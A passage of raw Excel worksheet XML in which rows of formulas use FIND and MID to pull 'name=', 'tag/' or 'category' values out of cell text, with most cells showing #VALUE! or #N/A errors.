        <f t="array" ref="E2924">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2924)), MID($A2924, FIND("name=",$A2924) + 5, LEN($A2924) - FIND("name=",$A2924)),
    ISNUMBER(FIND("tag/",$A2924)), MID($A2924, FIND("tag/",$A2924) + 4, LEN($A2924) - FIND("tag/",$A2924)),
    ISNUMBER(FIND("category",$A2924)), MID($A2924, FIND("category",$A2924) + 9, LEN($A2924) - FIND("category",$A2924)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2924" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2925" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2925" t="s">
        <v>2428</v>
      </c>
      <c r="B2925" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2925" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2925" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2925" t="e" cm="1">
        <f t="array" ref="E2925">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2925)), MID($A2925, FIND("name=",$A2925) + 5, LEN($A2925) - FIND("name=",$A2925)),
    ISNUMBER(FIND("tag/",$A2925)), MID($A2925, FIND("tag/",$A2925) + 4, LEN($A2925) - FIND("tag/",$A2925)),
    ISNUMBER(FIND("category",$A2925)), MID($A2925, FIND("category",$A2925) + 9, LEN($A2925) - FIND("category",$A2925)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2925" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2926" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2926" t="s">
        <v>2431</v>
      </c>
      <c r="B2926" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2926" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2926" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2926" t="e" cm="1">
        <f t="array" ref="E2926">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2926)), MID($A2926, FIND("name=",$A2926) + 5, LEN($A2926) - FIND("name=",$A2926)),
    ISNUMBER(FIND("tag/",$A2926)), MID($A2926, FIND("tag/",$A2926) + 4, LEN($A2926) - FIND("tag/",$A2926)),
    ISNUMBER(FIND("category",$A2926)), MID($A2926, FIND("category",$A2926) + 9, LEN($A2926) - FIND("category",$A2926)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2926" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2927" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2927" t="s">
        <v>2430</v>
      </c>
      <c r="B2927" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2927" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2927" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2927" t="e" cm="1">
        <f t="array" ref="E2927">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2927)), MID($A2927, FIND("name=",$A2927) + 5, LEN($A2927) - FIND("name=",$A2927)),
    ISNUMBER(FIND("tag/",$A2927)), MID($A2927, FIND("tag/",$A2927) + 4, LEN($A2927) - FIND("tag/",$A2927)),
    ISNUMBER(FIND("category",$A2927)), MID($A2927, FIND("category",$A2927) + 9, LEN($A2927) - FIND("category",$A2927)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2927" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2928" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2928" t="s">
        <v>2432</v>
      </c>
      <c r="B2928" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2928" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2928" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2928" t="e" cm="1">
        <f t="array" ref="E2928">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2928)), MID($A2928, FIND("name=",$A2928) + 5, LEN($A2928) - FIND("name=",$A2928)),
    ISNUMBER(FIND("tag/",$A2928)), MID($A2928, FIND("tag/",$A2928) + 4, LEN($A2928) - FIND("tag/",$A2928)),
    ISNUMBER(FIND("category",$A2928)), MID($A2928, FIND("category",$A2928) + 9, LEN($A2928) - FIND("category",$A2928)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2928" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2929" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2929" t="s">
        <v>2433</v>
      </c>
      <c r="B2929" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2929" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2929" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2929" t="e" cm="1">
        <f t="array" ref="E2929">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2929)), MID($A2929, FIND("name=",$A2929) + 5, LEN($A2929) - FIND("name=",$A2929)),
    ISNUMBER(FIND("tag/",$A2929)), MID($A2929, FIND("tag/",$A2929) + 4, LEN($A2929) - FIND("tag/",$A2929)),
    ISNUMBER(FIND("category",$A2929)), MID($A2929, FIND("category",$A2929) + 9, LEN($A2929) - FIND("category",$A2929)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2929" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2930" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2930" t="s">
        <v>2435</v>
      </c>
      <c r="B2930" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2930" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2930" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2930" t="e" cm="1">
        <f t="array" ref="E2930">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2930)), MID($A2930, FIND("name=",$A2930) + 5, LEN($A2930) - FIND("name=",$A2930)),
    ISNUMBER(FIND("tag/",$A2930)), MID($A2930, FIND("tag/",$A2930) + 4, LEN($A2930) - FIND("tag/",$A2930)),
    ISNUMBER(FIND("category",$A2930)), MID($A2930, FIND("category",$A2930) + 9, LEN($A2930) - FIND("category",$A2930)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2930" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2931" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2931" t="s">
        <v>2434</v>
      </c>
      <c r="B2931" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2931" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2931" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2931" t="e" cm="1">
        <f t="array" ref="E2931">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2931)), MID($A2931, FIND("name=",$A2931) + 5, LEN($A2931) - FIND("name=",$A2931)),
    ISNUMBER(FIND("tag/",$A2931)), MID($A2931, FIND("tag/",$A2931) + 4, LEN($A2931) - FIND("tag/",$A2931)),
    ISNUMBER(FIND("category",$A2931)), MID($A2931, FIND("category",$A2931) + 9, LEN($A2931) - FIND("category",$A2931)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2931" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2932" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2932" t="s">
        <v>2436</v>
      </c>
      <c r="B2932" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2932" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2932" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2932" t="e" cm="1">
        <f t="array" ref="E2932">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2932)), MID($A2932, FIND("name=",$A2932) + 5, LEN($A2932) - FIND("name=",$A2932)),
    ISNUMBER(FIND("tag/",$A2932)), MID($A2932, FIND("tag/",$A2932) + 4, LEN($A2932) - FIND("tag/",$A2932)),
    ISNUMBER(FIND("category",$A2932)), MID($A2932, FIND("category",$A2932) + 9, LEN($A2932) - FIND("category",$A2932)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2932" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2933" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2933" t="s">
        <v>2437</v>
      </c>
      <c r="B2933" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2933" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2933" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2933" t="e" cm="1">
        <f t="array" ref="E2933">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2933)), MID($A2933, FIND("name=",$A2933) + 5, LEN($A2933) - FIND("name=",$A2933)),
    ISNUMBER(FIND("tag/",$A2933)), MID($A2933, FIND("tag/",$A2933) + 4, LEN($A2933) - FIND("tag/",$A2933)),
    ISNUMBER(FIND("category",$A2933)), MID($A2933, FIND("category",$A2933) + 9, LEN($A2933) - FIND("category",$A2933)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2933" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2934" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2934" t="s">
        <v>2438</v>
      </c>
      <c r="B2934" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2934" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2934" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2934" t="e" cm="1">
        <f t="array" ref="E2934">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2934)), MID($A2934, FIND("name=",$A2934) + 5, LEN($A2934) - FIND("name=",$A2934)),
    ISNUMBER(FIND("tag/",$A2934)), MID($A2934, FIND("tag/",$A2934) + 4, LEN($A2934) - FIND("tag/",$A2934)),
    ISNUMBER(FIND("category",$A2934)), MID($A2934, FIND("category",$A2934) + 9, LEN($A2934) - FIND("category",$A2934)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2934" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2935" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2935" t="s">
        <v>2441</v>
      </c>
      <c r="B2935" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2935" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2935" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2935" t="e" cm="1">
        <f t="array" ref="E2935">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2935)), MID($A2935, FIND("name=",$A2935) + 5, LEN($A2935) - FIND("name=",$A2935)),
    ISNUMBER(FIND("tag/",$A2935)), MID($A2935, FIND("tag/",$A2935) + 4, LEN($A2935) - FIND("tag/",$A2935)),
    ISNUMBER(FIND("category",$A2935)), MID($A2935, FIND("category",$A2935) + 9, LEN($A2935) - FIND("category",$A2935)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2935" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2936" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2936" t="s">
        <v>2440</v>
      </c>
      <c r="B2936" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2936" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2936" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2936" t="e" cm="1">
        <f t="array" ref="E2936">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2936)), MID($A2936, FIND("name=",$A2936) + 5, LEN($A2936) - FIND("name=",$A2936)),
    ISNUMBER(FIND("tag/",$A2936)), MID($A2936, FIND("tag/",$A2936) + 4, LEN($A2936) - FIND("tag/",$A2936)),
    ISNUMBER(FIND("category",$A2936)), MID($A2936, FIND("category",$A2936) + 9, LEN($A2936) - FIND("category",$A2936)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2936" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2937" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2937" t="s">
        <v>2447</v>
      </c>
      <c r="B2937" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2937" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2937" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2937" t="e" cm="1">
        <f t="array" ref="E2937">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2937)), MID($A2937, FIND("name=",$A2937) + 5, LEN($A2937) - FIND("name=",$A2937)),
    ISNUMBER(FIND("tag/",$A2937)), MID($A2937, FIND("tag/",$A2937) + 4, LEN($A2937) - FIND("tag/",$A2937)),
    ISNUMBER(FIND("category",$A2937)), MID($A2937, FIND("category",$A2937) + 9, LEN($A2937) - FIND("category",$A2937)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2937" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2938" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2938" t="s">
        <v>2446</v>
      </c>
      <c r="B2938" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2938" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2938" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2938" t="e" cm="1">
        <f t="array" ref="E2938">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2938)), MID($A2938, FIND("name=",$A2938) + 5, LEN($A2938) - FIND("name=",$A2938)),
    ISNUMBER(FIND("tag/",$A2938)), MID($A2938, FIND("tag/",$A2938) + 4, LEN($A2938) - FIND("tag/",$A2938)),
    ISNUMBER(FIND("category",$A2938)), MID($A2938, FIND("category",$A2938) + 9, LEN($A2938) - FIND("category",$A2938)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2938" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2939" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2939" t="s">
        <v>2445</v>
      </c>
      <c r="B2939" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2939" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2939" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2939" t="e" cm="1">
        <f t="array" ref="E2939">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2939)), MID($A2939, FIND("name=",$A2939) + 5, LEN($A2939) - FIND("name=",$A2939)),
    ISNUMBER(FIND("tag/",$A2939)), MID($A2939, FIND("tag/",$A2939) + 4, LEN($A2939) - FIND("tag/",$A2939)),
    ISNUMBER(FIND("category",$A2939)), MID($A2939, FIND("category",$A2939) + 9, LEN($A2939) - FIND("category",$A2939)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2939" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2940" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2940" t="s">
        <v>2444</v>
      </c>
      <c r="B2940" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2940" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2940" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2940" t="e" cm="1">
        <f t="array" ref="E2940">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2940)), MID($A2940, FIND("name=",$A2940) + 5, LEN($A2940) - FIND("name=",$A2940)),
    ISNUMBER(FIND("tag/",$A2940)), MID($A2940, FIND("tag/",$A2940) + 4, LEN($A2940) - FIND("tag/",$A2940)),
    ISNUMBER(FIND("category",$A2940)), MID($A2940, FIND("category",$A2940) + 9, LEN($A2940) - FIND("category",$A2940)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2940" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2941" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2941" t="s">
        <v>2443</v>
      </c>
      <c r="B2941" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2941" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2941" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2941" t="e" cm="1">
        <f t="array" ref="E2941">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2941)), MID($A2941, FIND("name=",$A2941) + 5, LEN($A2941) - FIND("name=",$A2941)),
    ISNUMBER(FIND("tag/",$A2941)), MID($A2941, FIND("tag/",$A2941) + 4, LEN($A2941) - FIND("tag/",$A2941)),
    ISNUMBER(FIND("category",$A2941)), MID($A2941, FIND("category",$A2941) + 9, LEN($A2941) - FIND("category",$A2941)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2941" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2942" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2942" t="s">
        <v>2442</v>
      </c>
      <c r="B2942" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2942" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2942" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2942" t="e" cm="1">
        <f t="array" ref="E2942">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2942)), MID($A2942, FIND("name=",$A2942) + 5, LEN($A2942) - FIND("name=",$A2942)),
    ISNUMBER(FIND("tag/",$A2942)), MID($A2942, FIND("tag/",$A2942) + 4, LEN($A2942) - FIND("tag/",$A2942)),
    ISNUMBER(FIND("category",$A2942)), MID($A2942, FIND("category",$A2942) + 9, LEN($A2942) - FIND("category",$A2942)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2942" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2943" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2943" t="s">
        <v>2453</v>
      </c>
      <c r="B2943" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2943" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2943" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2943" t="e" cm="1">
        <f t="array" ref="E2943">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2943)), MID($A2943, FIND("name=",$A2943) + 5, LEN($A2943) - FIND("name=",$A2943)),
    ISNUMBER(FIND("tag/",$A2943)), MID($A2943, FIND("tag/",$A2943) + 4, LEN($A2943) - FIND("tag/",$A2943)),
    ISNUMBER(FIND("category",$A2943)), MID($A2943, FIND("category",$A2943) + 9, LEN($A2943) - FIND("category",$A2943)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2943" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2944" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2944" t="s">
        <v>2452</v>
      </c>
      <c r="B2944" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2944" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2944" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2944" t="e" cm="1">
        <f t="array" ref="E2944">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2944)), MID($A2944, FIND("name=",$A2944) + 5, LEN($A2944) - FIND("name=",$A2944)),
    ISNUMBER(FIND("tag/",$A2944)), MID($A2944, FIND("tag/",$A2944) + 4, LEN($A2944) - FIND("tag/",$A2944)),
    ISNUMBER(FIND("category",$A2944)), MID($A2944, FIND("category",$A2944) + 9, LEN($A2944) - FIND("category",$A2944)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2944" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2945" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2945" t="s">
        <v>2451</v>
      </c>
      <c r="B2945" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2945" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2945" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2945" t="e" cm="1">
        <f t="array" ref="E2945">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2945)), MID($A2945, FIND("name=",$A2945) + 5, LEN($A2945) - FIND("name=",$A2945)),
    ISNUMBER(FIND("tag/",$A2945)), MID($A2945, FIND("tag/",$A2945) + 4, LEN($A2945) - FIND("tag/",$A2945)),
    ISNUMBER(FIND("category",$A2945)), MID($A2945, FIND("category",$A2945) + 9, LEN($A2945) - FIND("category",$A2945)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2945" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2946" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2946" t="s">
        <v>2450</v>
      </c>
      <c r="B2946" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2946" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2946" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2946" t="e" cm="1">
        <f t="array" ref="E2946">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2946)), MID($A2946, FIND("name=",$A2946) + 5, LEN($A2946) - FIND("name=",$A2946)),
    ISNUMBER(FIND("tag/",$A2946)), MID($A2946, FIND("tag/",$A2946) + 4, LEN($A2946) - FIND("tag/",$A2946)),
    ISNUMBER(FIND("category",$A2946)), MID($A2946, FIND("category",$A2946) + 9, LEN($A2946) - FIND("category",$A2946)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2946" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2947" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2947" t="s">
        <v>2449</v>
      </c>
      <c r="B2947" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2947" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2947" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2947" t="e" cm="1">
        <f t="array" ref="E2947">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2947)), MID($A2947, FIND("name=",$A2947) + 5, LEN($A2947) - FIND("name=",$A2947)),
    ISNUMBER(FIND("tag/",$A2947)), MID($A2947, FIND("tag/",$A2947) + 4, LEN($A2947) - FIND("tag/",$A2947)),
    ISNUMBER(FIND("category",$A2947)), MID($A2947, FIND("category",$A2947) + 9, LEN($A2947) - FIND("category",$A2947)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2947" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2948" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2948" t="s">
        <v>2448</v>
      </c>
      <c r="B2948" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2948" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2948" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2948" t="e" cm="1">
        <f t="array" ref="E2948">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2948)), MID($A2948, FIND("name=",$A2948) + 5, LEN($A2948) - FIND("name=",$A2948)),
    ISNUMBER(FIND("tag/",$A2948)), MID($A2948, FIND("tag/",$A2948) + 4, LEN($A2948) - FIND("tag/",$A2948)),
    ISNUMBER(FIND("category",$A2948)), MID($A2948, FIND("category",$A2948) + 9, LEN($A2948) - FIND("category",$A2948)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2948" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2949" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2949" t="s">
        <v>2457</v>
      </c>
      <c r="B2949" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2949" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2949" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2949" t="e" cm="1">
        <f t="array" ref="E2949">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2949)), MID($A2949, FIND("name=",$A2949) + 5, LEN($A2949) - FIND("name=",$A2949)),
    ISNUMBER(FIND("tag/",$A2949)), MID($A2949, FIND("tag/",$A2949) + 4, LEN($A2949) - FIND("tag/",$A2949)),
    ISNUMBER(FIND("category",$A2949)), MID($A2949, FIND("category",$A2949) + 9, LEN($A2949) - FIND("category",$A2949)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2949" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2950" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2950" t="s">
        <v>2456</v>
      </c>
      <c r="B2950" t="e">
        <f t="shared" ref="B2950:B3013" si="139">IF(FIND("name=",A2950,1)&gt;0,MID(A2950,FIND("name=",A2950,1)+5,LEN(A2950)-FIND("name=",A2950,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C2950" t="e">
        <f t="shared" ref="C2950:C3013" si="140">IF(FIND("tag/",$A2950,1)&gt;0,MID($A2950,FIND("tag/",$A2950,1)+4,LEN($A2950)-FIND("tag/",$A2950,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D2950" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2950" t="e" cm="1">
        <f t="array" ref="E2950">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2950)), MID($A2950, FIND("name=",$A2950) + 5, LEN($A2950) - FIND("name=",$A2950)),
    ISNUMBER(FIND("tag/",$A2950)), MID($A2950, FIND("tag/",$A2950) + 4, LEN($A2950) - FIND("tag/",$A2950)),
    ISNUMBER(FIND("category",$A2950)), MID($A2950, FIND("category",$A2950) + 9, LEN($A2950) - FIND("category",$A2950)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2950" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2951" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2951" t="s">
        <v>2455</v>
      </c>
      <c r="B2951" t="e">
        <f t="shared" si="139"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2951" t="e">
        <f t="shared" si="140"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2951" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2951" t="e" cm="1">
        <f t="array" ref="E2951">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2951)), MID($A2951, FIND("name=",$A2951) + 5, LEN($A2951) - FIND("name=",$A2951)),
    ISNUMBER(FIND("tag/",$A2951)), MID($A2951, FIND("tag/",$A2951) + 4, LEN($A2951) - FIND("tag/",$A2951)),
    ISNUMBER(FIND("category",$A2951)), MID($A2951, FIND("category",$A2951) + 9, LEN($A2951) - FIND("category",$A2951)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2951" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2952" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2952" t="s">
        <v>2454</v>
      </c>
      <c r="B2952" t="e">
        <f t="shared" si="139"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2952" t="e">
        <f t="shared" si="140"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2952" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2952" t="e" cm="1">
        <f t="array" ref="E2952">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2952)), MID($A2952, FIND("name=",$A2952) + 5, LEN($A2952) - FIND("name=",$A2952)),
    ISNUMBER(FIND("tag/",$A2952)), MID($A2952, FIND("tag/",$A2952) + 4, LEN($A2952) - FIND("tag/",$A2952)),
    ISNUMBER(FIND("category",$A2952)), MID($A2952, FIND("category",$A2952) + 9, LEN($A2952) - FIND("category",$A2952)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2952" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2953" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2953" t="s">
        <v>2463</v>
      </c>
      <c r="B2953" t="e">
        <f t="shared" si="139"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2953" t="e">
        <f t="shared" si="140"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2953" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2953" t="e" cm="1">
        <f t="array" ref="E2953">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2953)), MID($A2953, FIND("name=",$A2953) + 5, LEN($A2953) - FIND("name=",$A2953)),
